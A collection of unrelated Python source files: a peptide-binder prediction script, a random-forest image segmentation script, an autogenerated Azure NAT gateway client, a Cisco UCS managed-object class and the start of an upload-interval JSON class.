data = [f.make_ranges(data[k], 50) for k in range(len(data))]
data = [[a[k] for a in data] for k in range(len(data[0]))]
return data
def data_for_orient_func(k):
inp3 = np.zeros((k, 2))
inp3[:, 0] = 1
return [inp3]
def data_for_binder_func(k, sstr):
inp3 = np.zeros((k, 2))
inp3[:, 0] = 1
temp = np.zeros((k, 6, 3))
for idx in range(k):
for jdx in range(2, 4):
temp[idx, jdx, int(sstr[idx, jdx-2])] = 1
return [temp, inp3]
def orient_predictions_func(data, keywords, ld, ldd, model):
test_ch = arr_ranges(data)
y_pred = [model.predict(i, verbose=0) for i in test_ch]
y_pred = np.vstack(y_pred)
pred_order = np.fliplr(np.argsort(y_pred, axis=1))
pred_order = [[[i,y_pred[jx, i]] for i in j] for jx, j in enumerate(pred_order)]
pred_order = [[[x[0] // 6, x[0] % 6, x[1]] for x in j] for j in pred_order]
pos_thr = 0.01 if 'pos_thr' not in keywords else float(keywords['pos_thr'])
pred_order = [[x for x in a if x[2] > pos_thr] for a in pred_order]
if ld[0] is not None:
pred_order = [[x for x in a if x[0] in ld[0]] for a in pred_order]
if ld[1] is not None:
pred_order = [[x for x in a if x[1] in ld[1]] for a in pred_order]
#print(pred_order)
if (ld[0] is None) and (ld[1] is None):
#print(ld, ldd)
if ldd[0] is not None:
pred_order = [[x for x in a if x[0] not in ldd[0]] for a in pred_order]
if ldd[1] is not None:
pred_order = [[x for x in a if x[1] in ldd[1]] for a in pred_order]
max_pos = 1 if 'max_pos' not in keywords else int(keywords['max_pos'])
pred_order = [i[:max_pos] for i in pred_order]
print(pred_order)
return pred_order
def sstr_predictions_func(data, keywords, model):
#print([i.shape for i in data])
test_ch = arr_ranges(data)
y_pred = [model.predict(i, verbose=0) for i in test_ch]
y_pred = np.vstack(y_pred)
pred_order = np.fliplr(np.argsort(y_pred, axis=1))
pred_order = [[[i,y_pred[jx, i]] for i in j if y_pred[jx, i]] for jx, j in enumerate(pred_order)]
pred_order = [[[x[0] // 3, x[0] % 3, x[1]] for x in j] for j in pred_order]
sst_thr = 0.01 if 'sst_thr' not in keywords else float(keywords['sst_thr'])
pred_order = [[x for x in a if x[2] > sst_thr] for a in pred_order]
if ('sst_type' in keywords):
sst_type = [sst_dict[a.strip()] for a in keywords['sst_type'].split(',')]
pred_order = [[x for x in a if len([j for j in x[:2] if j in sst_type]) == 2] for a in pred_order]
#else
max_sst = 1 if 'max_sst' not in keywords else int(keywords['max_sst'])
pred_order = [i[:max_sst] for i in pred_order]
return pred_order
def binders_predictions_func(data, o, s, model):
o, s = [str(np.round(int(i[-1]*100))) for i in o], [str(np.round(int(i[-1]*100))) for i in s]
test_ch = arr_ranges(data)
y_pred = [model.predict(i, verbose=0) for i in test_ch]
y_pred = np.vstack(y_pred)
return [y_pred, o, s]
def make_binders(data, data2, keywords):
model_pos = load_model(dir_models + 'Orn.hdf5')
model_sst = load_model(dir_models + 'SecS.hdf5')
model_bb = load_model(dir_models + 'PepBB.hdf5')
swap = 'False'
if ('swap_pose' in keywords) and (keywords['swap_pose'] == 'True'):
swap = 'True'
pdb_data_all = []
binder_files = []
data = f.readjson(data)
data2 = f.readjson(data2)
p_geom, p_sec, p_amn, p_mask, name = [np.array(data[x]) for x in ['p_xyz1', 'sec1', 'p_amn1', 'mask', 'name']]
data_for_orient_n = data_for_orient_func(len(name))
orients = orient_predictions_func([p_geom, p_sec, p_amn, p_mask] + data_for_orient_n, keywords, data2[0]['ld'], data2[0]['ldd'], model_pos)
num_orient = max([len(i) for i in orients])
for ornt in range(num_orient):
idx = [idx for idx in range(len(orients)) if len(orients[idx]) > ornt]
p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, name_idx = [a[idx] for a in [p_geom, p_sec, p_amn, p_mask, name]]
ornt_idx = np.array([o[ornt] for ox, o in enumerate(orients) if ox in idx])[:, :2]
data_for_sstr_n = data_for_orient_func(len(name_idx))
sstrs = sstr_predictions_func([p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, ornt_idx] + data_for_sstr_n, keywords, model_sst)
num_sstr = max([len(i) for i in sstrs])
for sstr in range(num_sstr):
jdx = [idx for idx in range(len(sstrs)) if len(sstrs[idx]) > sstr]
p_geom_jdx, p_sec_jdx, p_amn_jdx, p_mask_jdx, name_jdx = [a[jdx] for a in [p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, name_idx]]
p_ld_jdx = ornt_idx[jdx]
sstr_jdx = np.array([s[sstr] for sx, s in enumerate(sstrs) if sx in jdx])[:, :2]
data_for_binder_n = data_for_binder_func(len(name_jdx), sstr_jdx)
binders_data = binders_predictions_func([p_geom_jdx, p_sec_jdx, p_amn_jdx, p_mask_jdx, p_ld_jdx] + data_for_binder_n, ornt_idx, sstr_jdx, model_bb)
pdb_data = tc.calculate_rmsd(binders_data, data2, name_jdx, [str(ornt), str(sstr)], sstr_jdx.tolist(), keywords['prefix'], swap)
pdb_data_all += pdb_data
#print(pdb_data_all)
return pdb_data_all
def make_binders_E(data, data2, keywords, e, c_names = None):
nbem = 1
swap = 'False'
if ('swap_pose' in keywords) and (keywords['swap_pose'] == 'True'):
swap = 'True'
if ('num_pepbbe_m' in keywords) and (int(keywords['num_pepbbe_m']) in [1, 3]):
nbem = int(keywords['num_pepbbe_m'])
if e == 1:
model_pos = load_model(dir_models + 'Orn_C.hdf5')
model_sst = load_model(dir_models + 'SecS_C.hdf5')
model_bb = [load_model(dir_models + 'PepBB_C' + str(k) + '.hdf5') for k in range(1,nbem+1)]
elif (e == 0) or (e==10):
model_pos = load_model(dir_models + 'Orn_N.hdf5')
model_sst = load_model(dir_models + 'SecS_N.hdf5')
model_bb = [load_model(dir_models + 'PepBB_N' + str(k) + '.hdf5') for k in range(1,nbem+1)]
p_geom, p_sec, p_amn, p_mask, name, name_b, l_geom = data
pdb_data_all = []
binder_files = []
data2 = f.readjson(data2)
data_for_orient_n = data_for_orient_func(len(name))
orients = orient_predictions_func([p_geom, p_sec, p_amn, p_mask] + data_for_orient_n + [l_geom], keywords, data2[0]['ld'], data2[0]['ldd'], model_pos)
num_orient = max([len(i) for i in orients])
for ornt in range(num_orient):
idx = [idx for idx in range(len(orients)) if len(orients[idx]) > ornt]
p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, name_idx, name_b_idx, l_geom_idx = [a[idx] for a in [p_geom, p_sec, p_amn, p_mask, name, name_b, l_geom]]
ornt_idx = np.array([o[ornt] for ox, o in enumerate(orients) if ox in idx])[:, :2]
data_for_sstr_n = data_for_orient_func(len(name_idx))
sstrs = sstr_predictions_func([p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, ornt_idx] + data_for_sstr_n + [l_geom_idx], keywords, model_sst)
num_sstr = max([len(i) for i in sstrs])
for sstr in range(num_sstr):
for mm in range(len(model_bb)):
jdx = [idx for idx in range(len(sstrs)) if len(sstrs[idx]) > sstr]
p_geom_jdx, p_sec_jdx, p_amn_jdx, p_mask_jdx, name_jdx, name_b_jdx, l_geom_jdx = [a[jdx] for a in [p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, name_idx, name_b_idx, l_geom_idx]]
p_ld_jdx = ornt_idx[jdx]
sstr_jdx = np.array([s[sstr] for sx, s in enumerate(sstrs) if sx in jdx])[:, :2]
data_for_binder_n = data_for_binder_func(len(name_jdx), sstr_jdx)
binders_data = binders_predictions_func([p_geom_jdx, p_sec_jdx, p_amn_jdx, p_mask_jdx, p_ld_jdx] + data_for_binder_n + [l_geom_jdx[:,:,:,[0,1,2,4]]], ornt_idx, sstr_jdx, model_bb[mm])
pdb_data = tc.calculate_rmsde(binders_data, data2, name_jdx, name_b_jdx, [str(ornt), str(sstr), str(mm)], sstr_jdx.tolist(), keywords['prefix'], e, swap, c_names)
pdb_data_all += pdb_data
return pdb_data_all
def make_binders_end(data, data2, keywords):
def get_e_data(data, e):
idx = np.where(np.array(data['b_end']) == e)[0]
data = [np.array([a for ax, a in enumerate(data[x]) if ax in idx]) for x in data if x != 'b_end']
return data
data = f.readjson(data)
pdb_names_all = []
if 'binder_end' in keywords:
if keywords['binder_end'] == 'C':
data_C = get_e_data(data, 1)
pdb_names = make_binders_E(data_C, data2, keywords, 1)
elif keywords['binder_end'] == 'N':
data_N = get_e_data(data, 0)
pdb_names = make_binders_E(data_N, data2, keywords, 0)
else:
data_C = get_e_data(data, 1)
pdb_names = make_binders_E(data_C, data2, keywords, 1)
data_N = get_e_data(data, 0)
pdb_names = make_binders_E(data_N, data2, keywords, 10, pdb_names)
pdb_names_all += pdb_names
return pdb_names
input_file = sys.argv[1]
keywords = f.keywords(input_file)
prefix = keywords['prefix']
data = prefix + '/' + prefix + '_b.json'
data2 = prefix + '/' + prefix + '_2b.json'
if 'add_residues' in keywords:
pdb_names = make_binders_end(data, data2, keywords)
else:
pdb_names = make_binders(data, data2, keywords)
print(pdb_names)
f.writejson(prefix + '/' + prefix + '_names.json', pdb_names)
|
py | b4104046aa6b0f84c1f446ec0fe22f2a20ca8e3d | #Ref: Sreenivas Sarwar Anik
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import glob
import cv2
import pickle
from keras.models import Sequential
from keras.layers import Conv2D
import os
print(os.listdir("images/"))
SIZE = 512 #Resize images
train_images = []
for directory_path in glob.glob("images/train_images"):
for img_path in glob.glob(os.path.join(directory_path, "*.tif")):
img = cv2.imread(img_path, cv2.IMREAD_COLOR)
img = cv2.resize(img, (SIZE, SIZE))
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
train_images.append(img)
#train_labels.append(label)
train_images = np.array(train_images)
train_masks = []
for directory_path in glob.glob("images/train_masks"):
for mask_path in glob.glob(os.path.join(directory_path, "*.tif")):
mask = cv2.imread(mask_path, 0)
mask = cv2.resize(mask, (SIZE, SIZE))
#mask = cv2.cvtColor(mask, cv2.COLOR_RGB2BGR)
train_masks.append(mask)
#train_labels.append(label)
train_masks = np.array(train_masks)
X_train = train_images
y_train = train_masks
y_train = np.expand_dims(y_train, axis=3)
activation = 'sigmoid'
feature_extractor = Sequential()
feature_extractor.add(Conv2D(32, 3, activation = activation, padding = 'same', input_shape = (SIZE, SIZE, 3)))
feature_extractor.add(Conv2D(32, 3, activation = activation, padding = 'same', kernel_initializer = 'he_uniform'))
#feature_extractor.add(Conv2D(64, 3, activation = activation, padding = 'same', kernel_initializer = 'he_uniform'))
#feature_extractor.add(BatchNormalization())
#
#feature_extractor.add(Conv2D(64, 3, activation = activation, padding = 'same', kernel_initializer = 'he_uniform'))
#feature_extractor.add(BatchNormalization())
#feature_extractor.add(MaxPooling2D())
#feature_extractor.add(Flatten())
X = feature_extractor.predict(X_train)
X = X.reshape(-1, X.shape[3])
Y = y_train.reshape(-1)
dataset = pd.DataFrame(X)
dataset['Label'] = Y
print(dataset['Label'].unique())
print(dataset['Label'].value_counts())
##If we do not want to include pixels with value 0
##e.g. Sometimes unlabeled pixels may be given a value 0.
dataset = dataset[dataset['Label'] != 0]
X_for_RF = dataset.drop(labels = ['Label'], axis=1)
Y_for_RF = dataset['Label']
#RANDOM FOREST
from sklearn.ensemble import RandomForestClassifier
model = RandomForestClassifier(n_estimators = 50, random_state = 42)
# Train the model on training data
# Ravel Y to pass 1d array instead of column vector
model.fit(X_for_RF, Y_for_RF) #For sklearn no one hot encoding
filename = 'RF_model.sav'
pickle.dump(model, open(filename, 'wb'))
loaded_model = pickle.load(open(filename, 'rb'))
#READ EXTERNAL IMAGE...
test_img = cv2.imread('images/test_images/Sandstone_Versa0360.tif', cv2.IMREAD_COLOR)
test_img = cv2.resize(test_img, (SIZE, SIZE))
test_img = cv2.cvtColor(test_img, cv2.COLOR_RGB2BGR)
test_img = np.expand_dims(test_img, axis=0)
#predict_image = np.expand_dims(X_train[8,:,:,:], axis=0)
X_test_feature = feature_extractor.predict(test_img)
X_test_feature = X_test_feature.reshape(-1, X_test_feature.shape[3])
prediction = loaded_model.predict(X_test_feature)
prediction_image = prediction.reshape(mask.shape)
plt.imshow(prediction_image, cmap='gray')
|
py | b4104056ea8bddb93ec175ded6261409b0bee1c1 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class NatGatewaysOperations(object):
"""NatGatewaysOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2020-04-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2020-04-01"
self.config = config
def _delete_initial(
self, resource_group_name, nat_gateway_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'natGatewayName': self._serialize.url("nat_gateway_name", nat_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, nat_gateway_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified nat gateway.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param nat_gateway_name: The name of the nat gateway.
:type nat_gateway_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
nat_gateway_name=nat_gateway_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways/{natGatewayName}'}
def get(
self, resource_group_name, nat_gateway_name, expand=None, custom_headers=None, raw=False, **operation_config):
"""Gets the specified nat gateway in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param nat_gateway_name: The name of the nat gateway.
:type nat_gateway_name: str
:param expand: Expands referenced resources.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NatGateway or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2020_04_01.models.NatGateway or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'natGatewayName': self._serialize.url("nat_gateway_name", nat_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NatGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways/{natGatewayName}'}
def _create_or_update_initial(
self, resource_group_name, nat_gateway_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'natGatewayName': self._serialize.url("nat_gateway_name", nat_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'NatGateway')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NatGateway', response)
if response.status_code == 201:
deserialized = self._deserialize('NatGateway', response)
if response.status_code == 202:
deserialized = self._deserialize('NatGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, nat_gateway_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates a nat gateway.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param nat_gateway_name: The name of the nat gateway.
:type nat_gateway_name: str
:param parameters: Parameters supplied to the create or update nat
gateway operation.
:type parameters: ~azure.mgmt.network.v2020_04_01.models.NatGateway
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns NatGateway or
ClientRawResponse<NatGateway> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2020_04_01.models.NatGateway]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2020_04_01.models.NatGateway]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
nat_gateway_name=nat_gateway_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('NatGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways/{natGatewayName}'}
def update_tags(
self, resource_group_name, nat_gateway_name, tags=None, custom_headers=None, raw=False, **operation_config):
"""Updates nat gateway tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param nat_gateway_name: The name of the nat gateway.
:type nat_gateway_name: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NatGateway or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2020_04_01.models.NatGateway or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
parameters = models.TagsObject(tags=tags)
# Construct URL
url = self.update_tags.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'natGatewayName': self._serialize.url("nat_gateway_name", nat_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'TagsObject')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NatGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways/{natGatewayName}'}
def list_all(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all the Nat Gateways in a subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of NatGateway
:rtype:
~azure.mgmt.network.v2020_04_01.models.NatGatewayPaged[~azure.mgmt.network.v2020_04_01.models.NatGateway]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_all.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.NatGatewayPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/natGateways'}
def list(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets all nat gateways in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of NatGateway
:rtype:
~azure.mgmt.network.v2020_04_01.models.NatGatewayPaged[~azure.mgmt.network.v2020_04_01.models.NatGateway]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.NatGatewayPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways'}
|
py | b4104203755e97799ee7dc2cc8c9044a9ffd2bbd | """This module contains the general information for InitiatorStoreEp ManagedObject."""
import sys, os
from ...ucsmo import ManagedObject
from ...ucscoremeta import UcsVersion, MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class InitiatorStoreEpConsts():
ID_UNSPECIFIED = "unspecified"
TYPE_DEDICATED = "dedicated"
TYPE_POLICY = "policy"
TYPE_SHARED = "shared"
class InitiatorStoreEp(ManagedObject):
"""This is InitiatorStoreEp class."""
consts = InitiatorStoreEpConsts()
naming_props = set([u'id'])
mo_meta = MoMeta("InitiatorStoreEp", "initiatorStoreEp", "store-[id]", VersionMeta.Version211a, "InputOutput", 0x3f, [], ["read-only"], [u'initiatorGroupEp'], [], [None])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"ep_dn": MoPropertyMeta("ep_dn", "epDn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, 0, 256, None, [], []),
"id": MoPropertyMeta("id", "id", "string", VersionMeta.Version211a, MoPropertyMeta.NAMING, 0x8, None, None, None, ["unspecified"], ["0-4294967295"]),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x10, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version211a, MoPropertyMeta.READ_WRITE, 0x20, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"type": MoPropertyMeta("type", "type", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["dedicated", "policy", "shared"], []),
}
prop_map = {
"childAction": "child_action",
"dn": "dn",
"epDn": "ep_dn",
"id": "id",
"rn": "rn",
"sacl": "sacl",
"status": "status",
"type": "type",
}
def __init__(self, parent_mo_or_dn, id, **kwargs):
self._dirty_mask = 0
self.id = id
self.child_action = None
self.ep_dn = None
self.sacl = None
self.status = None
self.type = None
ManagedObject.__init__(self, "InitiatorStoreEp", parent_mo_or_dn, **kwargs)
|
py | b4104222718d89b6d3dbe13214bcb19b8e40db49 | """
Created on 24 Dec 2018
@author: Bruno Beloff ([email protected])
example:
{"upload": "2018-12-24T13:09:03Z", "rec": "2018-12-24T13:09:01Z", "offset": 2}
"""
from collections import OrderedDict
from scs_core.data.datetime import LocalizedDatetime
from scs_core.data.json import JSONable
from scs_core.data.path_dict import PathDict
from scs_core.data.timedelta import Timedelta
# --------------------------------------------------------------------------------------------------------------------
class UploadInterval(JSONable):
"""
classdocs
"""
UPLOAD_FIELD = 'upload'
REC_FIELD = 'payload.rec'
